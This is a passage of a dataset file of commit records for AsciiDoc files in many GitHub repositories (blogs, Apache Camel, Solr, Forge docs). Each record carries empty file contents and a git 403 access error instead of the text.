2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"846f61cbe188d1b366b7b4f1974b2b9c8c691460","subject":"y2b create post The Worst Text You Could Ever Receive...","message":"y2b create post The Worst Text You Could Ever Receive...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-16-The-Worst-Text-You-Could-Ever-Receive.adoc","new_file":"_posts\/2018-02-16-The-Worst-Text-You-Could-Ever-Receive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dd999f53dc7c33a8816503944a9122baeafafb9","subject":"Update 2014-05-08-Query-parameters-talk-slides.adoc","message":"Update 2014-05-08-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2014-05-08-Query-parameters-talk-slides.adoc","new_file":"_posts\/2014-05-08-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"677d9052f32c7d788c4c974164691d1cd80c3ec6","subject":"y2b create post Samsung UN65ES8000 65-Inch TV Unboxing (Samsung 8000 Series)","message":"y2b create post Samsung UN65ES8000 65-Inch TV Unboxing (Samsung 8000 Series)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-07-Samsung-UN65ES8000-65Inch-TV-Unboxing-Samsung-8000-Series.adoc","new_file":"_posts\/2012-12-07-Samsung-UN65ES8000-65Inch-TV-Unboxing-Samsung-8000-Series.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72dc1bcc47573cc7b23a4ac7e1ebad43b113460f","subject":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Publish 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2514db7b5eebe19c286dd456d91bb6c59db3738","subject":"Update 2015-03-08-PGP-Email-Encryption.adoc","message":"Update 2015-03-08-PGP-Email-Encryption.adoc","repos":"hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io,hemantthakur\/hemantthakur.github.io","old_file":"_posts\/2015-03-08-PGP-Email-Encryption.adoc","new_file":"_posts\/2015-03-08-PGP-Email-Encryption.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hemantthakur\/hemantthakur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c75cb86531c8aacef7a3c5e6fe0454222a71791","subject":"y2b create post Build Your Own Robot","message":"y2b create post Build Your Own Robot","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-21-Build-Your-Own-Robot.adoc","new_file":"_posts\/2015-10-21-Build-Your-Own-Robot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"607b4c5726f359ecc673c303dfdc0079410d46fe","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c9b14a033d5f7aa2a33d498df223350d7a9e55","subject":"start of comparison JCache cache2k API","message":"start of comparison JCache cache2k API\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_jcache-vs-cache2k-api.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_jcache-vs-cache2k-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"881e75ca9eca31926f95d4d10c953f8b0291c123","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5823fab181561f25c397ab1995e083047ab9e3b6","subject":"Unlink because broken","message":"Unlink because broken\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f1ebe34396a09a2ec4a1b468321500f3e22e045","subject":"Update 2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","message":"Update 2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Explaining-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a1d0815f4b1b1dc0422344dda642e3b48d298e5","subject":"y2b create post Rocksmith Unboxing (PlayStation 3)","message":"y2b create post Rocksmith Unboxing (PlayStation 3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-16-Rocksmith-Unboxing-PlayStation-3.adoc","new_file":"_posts\/2011-12-16-Rocksmith-Unboxing-PlayStation-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764988f08a1bf1858cfc932d2da3a4ddad3acf49","subject":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","message":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71f9e61150e27451b4be7f739ad58cccc2191234","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9233081f9010d147da94a4cc1c9037d3005533f3","subject":"Update 2015-05-25-This-is-a-test.adoc","message":"Update 2015-05-25-This-is-a-test.adoc","repos":"dfmooreqqq\/dfmooreqqq.github.io,dfmooreqqq\/dfmooreqqq.github.io,dfmooreqqq\/dfmooreqqq.github.io","old_file":"_posts\/2015-05-25-This-is-a-test.adoc","new_file":"_posts\/2015-05-25-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dfmooreqqq\/dfmooreqqq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d92545715a79941e418e86a14b0b20712e7f3112","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e021752a9ecfb0e6c22222c4a8bf30968c73fe58","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50f8d673f1d15a81995df8e4152ac60bb2da0236","subject":"Update 2016-08-20-Trackpad-Woes.adoc","message":"Update 2016-08-20-Trackpad-Woes.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_file":"_posts\/2016-08-20-Trackpad-Woes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03b5b10c279cf9d6885d4efc345ab249ad2469be","subject":"Update 2015-11-05-Dive-into-Python-3.adoc","message":"Update 2015-11-05-Dive-into-Python-3.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_file":"_posts\/2015-11-05-Dive-into-Python-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d0572f4851e27e6a8d648c2058bcdbc714c160","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9711b5fdef18c656e2c403ee7360ca1a373bbdfd","subject":"Update 2019-01-31-Hello-Github-World.adoc","message":"Update 2019-01-31-Hello-Github-World.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2019-01-31-Hello-Github-World.adoc","new_file":"_posts\/2019-01-31-Hello-Github-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b41cfa5f3e45191e5e44c407468fd12f84ea9c5","subject":"Update 2015-02-16-asdfas.adoc","message":"Update 2015-02-16-asdfas.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-asdfas.adoc","new_file":"_posts\/2015-02-16-asdfas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47322bfb0941108950d1806b3bf4e2a24ac31aa","subject":"Create README.adoc","message":"Create README.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.19-3\/ubuntu\/README.adoc","new_file":"1.0.0-beta.19-3\/ubuntu\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc433a0b4d19f10c72ef58d4306d9aebd5e6bafc","subject":"zsh: Add more installation instructions","message":"zsh: Add more installation instructions\n\nNow that the configuration supports the XDG base directory\nspecification, the user should create those directories. This is\nimportant, because some applications fail when the directories do not\nexist already.\n","repos":"PigeonF\/.dotfiles","old_file":"zsh\/README.adoc","new_file":"zsh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9958c3e81df6d8e1e6cabdb2f9dfb05e1659f34e","subject":"Added blog post about Forge 2.18.0.Final","message":"Added blog post about Forge 2.18.0.Final\n","repos":"forge\/docs,forge\/docs,luiz158\/docs,luiz158\/docs","old_file":"news\/2015-08-19-forge-2.18.0.final.asciidoc","new_file":"news\/2015-08-19-forge-2.18.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9c364b2d8640e84a2fe3b7a8d8adfc20d3d53e38","subject":"SOLR-12684: put expression names and params in monospace","message":"SOLR-12684: put expression names and params in monospace\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/stream-decorator-reference.adoc","new_file":"solr\/solr-ref-guide\/src\/stream-decorator-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef3912205738251c71f3137a6e0da2a0793ea8aa","subject":"Update 2016-06-15-The-softer-side-of-programming.adoc","message":"Update 2016-06-15-The-softer-side-of-programming.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-06-15-The-softer-side-of-programming.adoc","new_file":"_posts\/2016-06-15-The-softer-side-of-programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"884522e824989045ff1b3042f81f2c5bf4f6041b","subject":"adding forward CDI post","message":"adding forward CDI post\n","repos":"antoinesd\/antoinesd.github.io,antoinesd\/antoinesd.github.io","old_file":"2014-03-15-forward-cdi-2-0.adoc","new_file":"2014-03-15-forward-cdi-2-0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoinesd\/antoinesd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa4465999dbc8f441930f3ff943a80a9cfc221d","subject":"Added terser-language to Gitbook","message":"Added terser-language to Gitbook\n","repos":"adessaigne\/camel,dmvolod\/camel,veithen\/camel,JYBESSON\/camel,bgaudaen\/camel,christophd\/camel,veithen\/camel,hqstevenson\/camel,apache\/camel,sabre1041\/camel,kevinearls\/camel,tlehoux\/camel,JYBESSON\/camel,jkorab\/camel,driseley\/camel,salikjan\/camel,mcollovati\/camel,christophd\/camel,CodeSmell\/camel,nikhilvibhav\/camel,kevinearls\/camel,prashant2402\/camel,RohanHart\/camel,akhettar\/camel,onders86\/camel,christophd\/camel,objectiser\/camel,RohanHart\/camel,driseley\/camel,sverkera\/camel,tlehoux\/camel,DariusX\/camel,veithen\/camel,tadayosi\/camel,tkopczynski\/camel,pmoerenhout\/camel,prashant2402\/camel,pax95\/camel,onders86\/camel,driseley\/camel,isavin\/camel,drsquidop\/camel,mgyongyosi\/camel,w4tson\/camel,bhaveshdt\/camel,christophd\/camel,nboukhed\/camel,sverkera\/camel,CodeSmell\/camel,pkletsko\/camel,allancth\/camel,apache\/camel,gilfernandes\/camel,pmoerenhout\/camel,pmoerenhout\/camel,NickCis\/camel,snurmine\/camel,gilfernandes\/camel,rmarting\/camel,prashant2402\/camel,acartapanis\/camel,sabre1041\/camel,zregvart\/camel,gnodet\/camel,curso007\/camel,mgyongyosi\/camel,lburgazzoli\/camel,pax95\/camel,punkhorn\/camel-upstream,nboukhed\/camel,bhaveshdt\/camel,NickCis\/camel,dmvolod\/camel,pax95\/camel,nboukhed\/camel,sirlatrom\/camel,DariusX\/camel,punkhorn\/camel-upstream,gautric\/camel,tadayosi\/camel,dmvolod\/camel,neoramon\/camel,rmarting\/camel,snurmine\/camel,anton-k11\/camel,JYBESSON\/camel,yuruki\/camel,Thopap\/camel,acartapanis\/camel,w4tson\/camel,chirino\/camel,tadayosi\/camel,davidkarlsen\/camel,sverkera\/camel,adessaigne\/camel,allancth\/camel,davidkarlsen\/camel,ssharma\/camel,drsquidop\/camel,isavin\/camel,rmarting\/camel,lburgazzoli\/camel,onders86\/camel,NickCis\/camel,scranton\/camel,gilfernandes\/camel,jkorab\/camel,ullgren\/camel,JYBESSON\/camel,jarst\/camel,scranton\/camel,mgyongyosi\/camel,curso007\/camel,hqstevenson\/camel,jkorab\/camel,lburgazzoli\/apache-camel,pax95\/camel,adessaigne\/camel,anoordover\/camel,veithen\/camel,tkopczynski\/camel,isavin\/camel,allancth\/camel,isavin\/camel,tadayosi\/camel,anoordover\/camel,dmvolod\/camel,isavin\/camel,tdiesler\/camel,veithen\/camel,prashant2402\/camel,adessaigne\/camel,pkletsko\/camel,curso007\/camel,dmvolod\/camel,tlehoux\/camel,jamesnetherton\/camel,tadayosi\/camel,sirlatrom\/camel,tkopczynski\/camel,salikjan\/camel,jarst\/camel,chirino\/camel,acartapanis\/camel,snurmine\/camel,sabre1041\/camel,jarst\/camel,chirino\/camel,kevinearls\/camel,CodeSmell\/camel,gilfernandes\/camel,Thopap\/camel,apache\/camel,pmoerenhout\/camel,rmarting\/camel,cunningt\/camel,anoordover\/camel,bgaudaen\/camel,tdiesler\/camel,sirlatrom\/camel,tdiesler\/camel,jamesnetherton\/camel,pkletsko\/camel,mcollovati\/camel,nicolaferraro\/camel,anoordover\/camel,bhaveshdt\/camel,CodeSmell\/camel,ssharma\/camel,gilfernandes\/camel,neoramon\/camel,tdiesler\/camel,snurmine\/camel,scranton\/camel,prashant2402\/camel,jamesnetherton\/camel,lburgazzoli\/apache-camel,allancth\/camel,cunningt\/camel,JYBESSON\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,snurmine\/camel,tkopczynski\/camel,pax95\/camel,akhettar\/camel,jkorab\/camel,neoramon\/camel,acartapanis\/camel,bhaveshdt\/camel,ullgren\/camel,zregvart\/camel,alvinkwekel\/camel,drsquidop\/camel,gautric\/camel,anton-k11\/camel,dmvolod\/camel,pkletsko\/camel,christophd\/camel,pmoerenhout\/camel,drsquidop\/camel,scranton\/camel,yuruki\/camel,tkopczynski\/camel,gnodet\/camel,pmoerenhout\/camel,pkletsko\/camel,sirlatrom\/camel,gautric\/camel,rmarting\/camel,sverkera\/camel,apache\/camel,mgyongyosi\/camel,pax95\/camel,jonmcewen\/camel,gautric\/camel,anoordover\/camel,nboukhed\/camel,nboukhed\/camel,anton-k11\/camel,lburgazzoli\/camel,anton-k11\/camel,sverkera\/camel,w4tson\/camel,gnodet\/camel,punkhorn\/camel-upstream,RohanHart\/camel,gautric\/camel,allancth\/camel,jarst\/camel,onders86\/camel,zregvart\/camel,lburgazzoli\/camel,driseley\/camel,hqstevenson\/camel,nikhilvibhav\/camel,curso007\/camel,bgaudaen\/camel,christophd\/camel,alvinkwekel\/camel,cunningt\/camel,apache\/camel,driseley\/camel,objectiser\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,jonmcewen\/camel,neoramon\/camel,nboukhed\/camel,isavin\/camel,kevinearls\/camel,acartapanis\/camel,ullgren\/camel,onders86\/camel,adessaigne\/camel,curso007\/camel,lburgazzoli\/camel,gnodet\/camel,gilfernandes\/camel,lburgazzoli\/camel,w4tson\/camel,sabre1041\/camel,jonmcewen\/camel,RohanHart\/camel,jkorab\/camel,objectiser\/camel,alvinkwekel\/camel,alvinkwekel\/camel,ssharma\/camel,mgyongyosi\/camel,pkletsko\/camel,tkopczynski\/camel,tlehoux\/camel,anoordover\/camel,w4tson\/camel,Fabryprog\/camel,davidkarlsen\/camel,cunningt\/camel,Fabryprog\/camel,acartapanis\/camel,DariusX\/camel,akhettar\/camel,sabre1041\/camel,hqstevenson\/camel,ssharma\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,veithen\/camel,bgaudaen\/camel,w4tson\/camel,nicolaferraro\/camel,jamesnetherton\/camel,Fabryprog\/camel,NickCis\/camel,snurmine\/camel,akhettar\/camel,sirlatrom\/camel,neoramon\/camel,jarst\/camel,NickCis\/camel,scranton\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,Thopap\/camel,prashant2402\/camel,Thopap\/camel,davidkarlsen\/camel,kevinearls\/camel,tadayosi\/camel,cunningt\/camel,NickCis\/camel,cunningt\/camel,yuruki\/camel,RohanHart\/camel,adessaigne\/camel,mcollovati\/camel,objectiser\/camel,neoramon\/camel,ssharma\/camel,yuruki\/camel,bgaudaen\/camel,gautric\/camel,jarst\/camel,yuruki\/camel,chirino\/camel,chirino\/camel,drsquidop\/camel,onders86\/camel,yuruki\/camel,nikhilvibhav\/camel,scranton\/camel,tlehoux\/camel,hqstevenson\/camel,anton-k11\/camel,Thopap\/camel,ssharma\/camel,tdiesler\/camel,Fabryprog\/camel,jkorab\/camel,gnodet\/camel,rmarting\/camel,ullgren\/camel,jonmcewen\/camel,curso007\/camel,mcollovati\/camel,jonmcewen\/camel,akhettar\/camel,anton-k11\/camel,chirino\/camel,sirlatrom\/camel,tdiesler\/camel,zregvart\/camel,jonmcewen\/camel,DariusX\/camel,driseley\/camel,hqstevenson\/camel,kevinearls\/camel,sabre1041\/camel,nicolaferraro\/camel,JYBESSON\/camel,sverkera\/camel,RohanHart\/camel,akhettar\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,allancth\/camel,lburgazzoli\/apache-camel,jamesnetherton\/camel,bgaudaen\/camel,Thopap\/camel,jamesnetherton\/camel,apache\/camel","old_file":"components\/camel-hl7\/src\/main\/docs\/terser-language.adoc","new_file":"components\/camel-hl7\/src\/main\/docs\/terser-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8070f92ef9f99de9f2c5bf0d44041b23fa5b038","subject":"y2b create post Personal TECH TOUR + Meet AJ the new guy!","message":"y2b create post Personal TECH TOUR + Meet AJ the new guy!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-21-Personal-TECH-TOUR--Meet-AJ-the-new-guy.adoc","new_file":"_posts\/2013-01-21-Personal-TECH-TOUR--Meet-AJ-the-new-guy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d4add5131d8d1bd62cb243ef8dd1ed761904549","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e50b9df9f86f8aee3cc27f3c2229a1e2a879839","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-The%20Black%20Friday%20Deals%20They%20Won't%20Show%20You....adoc","new_file":"_posts\/2017-11-23-The%20Black%20Friday%20Deals%20They%20Won't%20Show%20You....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dbc5882dbbff571bffeddaf55668da6caa0d001","subject":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f992d7a1991b5fadee218c19bdd1f6a1fba87b51","subject":"Added Tutorial on how to run Furnace in a standalone app","message":"Added Tutorial on how to run Furnace in a standalone app\n","repos":"forge\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,luiz158\/docs,luiz158\/docs","old_file":"tutorials\/Running-Standalone-Furnace.asciidoc","new_file":"tutorials\/Running-Standalone-Furnace.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} 